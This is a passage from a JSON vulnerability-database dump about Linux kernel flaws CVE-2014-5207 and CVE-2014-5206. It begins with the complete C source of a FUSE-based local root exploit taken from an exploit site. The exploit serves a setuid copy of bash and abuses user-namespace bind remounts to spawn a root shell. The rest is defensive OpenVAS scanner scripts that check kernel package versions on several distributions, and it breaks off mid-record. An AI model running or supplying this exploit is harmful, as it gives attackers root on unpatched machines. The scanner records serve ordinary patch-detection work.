_GNU_SOURCE\r\n#define FUSE_USE_VERSION 26\r\n \r\n#include <fuse.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <err.h>\r\n#include <sched.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mount.h>\r\n#include <unistd.h>\r\n \r\nstatic const char *sh_path = \"/sh\";\r\nstatic int sh_fd;\r\nstatic loff_t sh_size;\r\n \r\nstatic int hello_getattr(const char *path, struct stat *stbuf)\r\n{\r\n int res = 0;\r\n \r\n memset(stbuf, 0, sizeof(struct stat));\r\n if (strcmp(path, \"/\") == 0) {\r\n stbuf->st_mode = S_IFDIR | 0755;\r\n stbuf->st_nlink = 2;\r\n } else if (strcmp(path, sh_path) == 0) {\r\n stbuf->st_mode = S_IFREG | 04755;\r\n stbuf->st_nlink = 1;\r\n stbuf->st_size = sh_size;\r\n } else\r\n res = -ENOENT;\r\n \r\n return res;\r\n}\r\n \r\nstatic int hello_readdir(const char *path, void *buf, fuse_fill_dir_t filler,\r\n off_t offset, struct fuse_file_info *fi)\r\n{\r\n (void) offset;\r\n (void) fi;\r\n \r\n if (strcmp(path, \"/\") != 0)\r\n return -ENOENT;\r\n \r\n filler(buf, \".\", NULL, 0);\r\n filler(buf, \"..\", NULL, 0);\r\n filler(buf, sh_path + 1, NULL, 0);\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_open(const char *path, struct fuse_file_info *fi)\r\n{\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n if ((fi->flags & 3) != O_RDONLY)\r\n return -EACCES;\r\n \r\n return 0;\r\n}\r\n \r\nstatic int hello_read(const char *path, char *buf, size_t size, off_t offset,\r\n struct fuse_file_info *fi)\r\n{\r\n (void) fi;\r\n if (strcmp(path, sh_path) != 0)\r\n return -ENOENT;\r\n \r\n return pread(sh_fd, buf, size, offset);\r\n}\r\n \r\nstatic struct fuse_operations hello_oper = {\r\n .getattr = hello_getattr,\r\n .readdir = hello_readdir,\r\n .open = hello_open,\r\n .read = hello_read,\r\n};\r\n \r\nstatic int evilfd = -1;\r\n \r\nstatic int child2(void *mnt_void)\r\n{\r\n const char *mountpoint = mnt_void;\r\n int fd2;\r\n \r\n if (unshare(CLONE_NEWUSER | CLONE_NEWNS) != 0)\r\n err(1, \"unshare\");\r\n \r\n if (mount(mountpoint, mountpoint, NULL, MS_REMOUNT | MS_BIND, NULL) < 0)\r\n err(1, \"mount\");\r\n \r\n fd2 = open(mountpoint, O_RDONLY | O_DIRECTORY);\r\n if (fd2 == -1)\r\n err(1, \"open\");\r\n \r\n if (dup3(fd2, evilfd, O_CLOEXEC) == -1)\r\n err(1, \"dup3\");\r\n close(fd2);\r\n \r\n printf(\"Mount hackery seems to have worked.\\n\");\r\n \r\n exit(0);\r\n}\r\n \r\nstatic int child1(const char *mountpoint)\r\n{\r\n char child2stack[2048];\r\n char evil_path[1024];\r\n \r\n evilfd = dup(0);\r\n if (evilfd == -1)\r\n err(1, \"dup\");\r\n \r\n if (clone(child2, child2stack,\r\n CLONE_FILES | CLONE_VFORK,\r\n (void *)mountpoint) == -1)\r\n err(1, \"clone\");\r\n \r\n printf(\"Here goes...\\n\");\r\n \r\n sprintf(evil_path, \"/proc/self/fd/%d/sh\", evilfd);\r\n execl(evil_path, \"sh\", \"-p\", NULL);\r\n perror(evil_path);\r\n return 1;\r\n}\r\n \r\nstatic int fuse_main_suid(int argc, char *argv[],\r\n const struct fuse_operations *op,\r\n void *user_data)\r\n{\r\n struct fuse *fuse;\r\n char *mountpoint;\r\n int multithreaded;\r\n int res;\r\n \r\n if (argc != 2) {\r\n printf(\"Usage: fuse_suid <mountpoint>\\n\");\r\n return -EINVAL;\r\n }\r\n \r\n char *args[] = {\"fuse_suid\", \"-f\", \"--\", argv[1], NULL};\r\n \r\n fuse = fuse_setup(sizeof(args)/sizeof(args[0]) - 1, args,\r\n op, sizeof(*op), &mountpoint,\r\n &multithreaded, user_data);\r\n if (fuse == NULL)\r\n return 1;\r\n \r\n printf(\"FUSE initialized. Time to have some fun...\\n\");\r\n printf(\"Warning: this exploit hangs on exit. Hit Ctrl-C when done.\\n\");\r\n if (fork() == 0)\r\n _exit(child1(mountpoint));\r\n \r\n if (multithreaded)\r\n res = fuse_loop_mt(fuse);\r\n else\r\n res = fuse_loop(fuse);\r\n \r\n fuse_teardown(fuse, mountpoint);\r\n if (res == -1)\r\n return 1;\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n sh_fd = open(\"/bin/bash\", O_RDONLY);\r\n if (sh_fd == -1)\r\n err(1, \"sh\");\r\n sh_size = lseek(sh_fd, 0, SEEK_END);\r\n return fuse_main_suid(argc, argv, &hello_oper, NULL);\r\n}\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 6.0, "vector": "AV:LOCAL/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22736"}], "openvas": [{"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-08-19T00:00:00", "id": "OPENVAS:1361412562310841934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841934", "type": "openvas", "title": "Ubuntu Update for linux USN-2318-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2318_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-2318-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841934\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-19 05:59:14 +0200 (Tue, 19 Aug 2014)\");\n script_cve_id(\"CVE-2014-5207\", \"CVE-2014-5206\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-2318-1\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"insight\", value:\"Eric W. Biederman discovered a flaw with the mediation of\nmount flags in the Linux kernel's user namespace subsystem. An unprivileged\nuser could exploit this flaw to by-pass mount restrictions, and potentially gain\nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used with\nuser namespaces. An unprivileged local user could exploit this flaw to gain\nfull write privileges to a mount that should be read only. (CVE-2014-5206)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2318-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2318-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic-lpae\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-lowlatency\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc-e500\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc-e500mc\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc-smp\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc64-emb\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-powerpc64-smp\", ver:\"3.13.0-34.60\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:00:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120086", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-417)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120086\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:17:06 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-417)\");\n script_tag(name:\"insight\", value:\"fs/namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a mount -o remount command within a user namespace. The do_remount function in fs/namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a mount -o remount command within a user namespace.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system. You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-417.html\");\n script_cve_id(\"CVE-2014-5207\", \"CVE-2014-5206\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.14.19~17.43.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-08-19T00:00:00", "id": "OPENVAS:1361412562310841935", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841935", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2317-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2317_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-trusty USN-2317-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841935\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-19 05:59:19 +0200 (Tue, 19 Aug 2014)\");\n script_cve_id(\"CVE-2014-5207\", \"CVE-2014-5206\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2317-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Eric W. Biederman discovered a flaw with the mediation of mount\nflags in the Linux kernel's user namespace subsystem. An unprivileged user could\nexploit this flaw to by-pass mount restrictions, and potentially gain\nadministrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used with\nuser namespaces. An unprivileged local user could exploit this flaw to gain\nfull write privileges to a mount that should be read only. (CVE-2014-5206)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2317-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2317-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic\", ver:\"3.13.0-34.60~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-34-generic-lpae\", ver:\"3.13.0-34.60~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-05T16:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7472", "CVE-2016-5828", "CVE-2017-7645", "CVE-2017-5967", "CVE-2013-4270", "CVE-2017-16537", "CVE-2016-2544", "CVE-2015-0570", "CVE-2016-4558", "CVE-2017-10911", "CVE-2017-16647", "CVE-2015-5697", "CVE-2017-16643", "CVE-2017-2647", "CVE-2018-12233", "CVE-2014-5207", "CVE-2016-6130", "CVE-2015-8845", "CVE-2013-4299", "CVE-2018-15572"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191478", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191478", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1478)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1478\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-4270\", \"CVE-2013-4299\", \"CVE-2014-5207\", \"CVE-2015-0570\", \"CVE-2015-5697\", \"CVE-2015-8845\", \"CVE-2016-2544\", \"CVE-2016-4558\", \"CVE-2016-5828\", \"CVE-2016-6130\", \"CVE-2017-10911\", \"CVE-2017-16537\", \"CVE-2017-16643\", \"CVE-2017-16647\", \"CVE-2017-2647\", \"CVE-2017-5967\", \"CVE-2017-7472\", \"CVE-2017-7645\", \"CVE-2018-12233\", \"CVE-2018-15572\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:51:12 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1478)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1478\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1478\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1478 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In the ea_get function in fs/jfs/xattr.c in the Linux kernel through 4.17.1, a memory corruption bug in JFS can be triggered by calling setxattr twice with two different extended attribute names on the same file. This vulnerability can be triggered by an unprivileged user with the ability to create files and execute programs. A kmalloc call is incorrect, leading to slab-out-of-bounds in jfs_xattr.(CVE-2018-12233)\n\nThe spectre_v2_select_mitigation function in arch/x86/kernel/cpu/bugs.c in the Linux kernel before 4.18.1 does not always fill RSB upon a context switch, which makes it easier for attackers to conduct userspace-userspace spectreRSB attacks.(CVE-2018-15572)\n\nRace condition in the queue_delete function in sound/core/seq/seq_queue.c in the Linux kernel before 4.4.1 allows local users to cause a denial of service (use-after-free and system crash) by making an ioctl call at a certain time.(CVE-2016-2544)\n\nA flaw was found in the Linux kernel's implementation of BPF in which systems can application can overflow a 32 bit refcount in both program and map refcount. This refcount can wrap and end up a user after free.(CVE-2016-4558)\n\nInterpretation conflict in drivers/md/dm-snap-persistent.c in the Linux kernel through 3.11.6 allows remote authenticated users to obtain sensitive information or modify data via a crafted mapping to a snapshot block device.(CVE-2013-4299)\n\nThe imon_probe function in drivers/media/rc/imon.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16537)\n\nA vulnerability in the handling of Transactional Memory on powerpc systems was found. An unprivileged local user can crash the kernel by starting a transaction, suspending it, and then calling any of the exec() class system calls.(CVE-2016-5828)\n\nA cross-boundary flaw was discovered in the Linux kernel software raid driver. The driver accessed a disabled bitmap where only the first byte of the buffer was initialized to zero. This meant that the rest of the request (up to 4095 bytes) was left and copied into user space. An attacker could use this flaw to read private information from user space that would not otherwise have been accessible.(CVE-2015-5697)\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.(CVE-2017-16643)\n\nRace condition in the ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T19:01:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5077", "CVE-2014-3182", "CVE-2013-2898", "CVE-2014-3186", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-9090", "CVE-2014-3688", "CVE-2014-7841", "CVE-2013-2891", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-9322", "CVE-2014-0206", "CVE-2014-3181", "CVE-2014-8709", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-4715", "CVE-2014-8884", "CVE-2014-4608", "CVE-2014-4611", "CVE-2013-7263", "CVE-2014-0181", "CVE-2014-5207", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-8133", "CVE-2014-7826", "CVE-2014-3184", "CVE-2014-3687"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-12-22T00:00:00", "id": "OPENVAS:1361412562310850628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850628", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2014:1677-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n 